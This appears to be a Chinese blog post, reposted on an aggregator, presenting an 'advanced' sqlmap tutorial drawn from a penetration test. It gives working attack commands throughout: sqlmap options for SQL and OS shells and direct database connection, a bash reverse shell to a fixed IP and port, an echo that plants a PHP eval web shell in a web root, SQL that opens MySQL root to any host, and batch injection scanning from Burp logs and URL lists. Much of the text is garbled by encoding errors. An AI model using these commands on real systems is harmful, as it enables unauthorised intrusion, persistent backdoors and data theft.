sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程
昨天對(duì)一個(gè)網(wǎng)站做滲透測(cè)試,本來(lái)想自己寫(xiě)腳本來(lái)sql注入的,但是覺(jué)得麻煩還是用了sqlmap
這一用發(fā)現(xiàn)sqlmap好多好玩的地方,以前用sqlmap 也就 -r -u ,覺(jué)得這樣就夠用了,直到昨天才發(fā)現(xiàn) 如同天上降魔主,真是人間太歲神 這個(gè)sqlmap……牛x
弱口令進(jìn)入后臺(tái)
發(fā)現(xiàn)sql注入(至少有xor注入)
上sqlmap(因?yàn)閼?
抓包
Sqlmap的 基本流程我就不走了,直接上我發(fā)現(xiàn)的好玩的東西吧
python3 .sqlmap.py -r C:甥敳獲wzwDesktopdd.txt -p searchField --sql-shell
1. 通過(guò)sqlmap連接mysql獲取shell
一、sqlmap 可以直連數(shù)據(jù)庫(kù),之前我都一直用navicat連的
sqlmap.py -d “mysql://root:xxx@x.x.x.x:3306/mysql”–os-shell
二、反彈shell
bash -i >& /dev/tcp/192.168.1.3/8888>&1
三、echo 寫(xiě)shell
echo “<?php @eval($_POST['chopper']);?>” >/var/www/html/1.php
四、讓sql 無(wú)密碼
use mysql;
update userset host = ‘%’ where user = ‘root’;
FLUSHPRIVILEGES ;
有時(shí)候?qū)σ恍┚W(wǎng)站做資產(chǎn)收集(比如護(hù)網(wǎng)的時(shí)候),想對(duì)他們做批量的sql注入檢測(cè)這時(shí)候我們可以配合burp來(lái)進(jìn)行批量注入
1. 首先是burp設(shè)置記錄log
2. 2.把記錄的log文件放sqlmap目錄
3. 3.sqlmap讀log自動(dòng)測(cè)試:
python sqlmap.py -l 文件名 --batch -smart
batch:自動(dòng)選yes。
smart:啟發(fā)式快速判斷,節(jié)約時(shí)間。
最后能注入的url會(huì)保存到out文件夾下
注意:log文件中如果有sqlmap無(wú)法讀取的字符(ascii碼之外的字符)會(huì)讀取失敗。
執(zhí)行命令:sqlmap.py -l burp.log --batch -smart 即可對(duì)burp.log中保存的所有request進(jìn)行注入掃描。
Batch:會(huì)自動(dòng)選擇yes(這個(gè)很贊,我可不希望一直按 回車回車回車……)
Smart:啟發(fā)式快速判斷,節(jié)約時(shí)間。
window版的sqlmap最后能注入的URL 會(huì)存儲(chǔ)到C:甥敳獲Administrator.sqlmap文件夾下。
批量注入
Sqlmap可以從文本文件中解析目標(biāo)
url.txt,內(nèi)容為:
? www.target1.com/vuln1.php?q=foobar? www.target2.com/vuln2.asp?id=1? www.target3.com/vuln3/id/1*?可以執(zhí)行?? python sqlmap.py -m url.txt?同樣,執(zhí)行該命令時(shí),Sqlmap會(huì)很貼心地一個(gè)個(gè)詢問(wèn):“do you want to test this URL”?顯然sqlmap還沒(méi)通過(guò)圖靈測(cè)試,這并不是我們希望看到的所以
? python sqlmap.py -m url.txt --batch?這樣我門(mén)就可以默認(rèn)回答他”YES i want to test this url”總結(jié)
以上是生活随笔為你收集整理的sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: python 代码转程序_python将
- 下一篇: tns03505 无法解析名称_Spri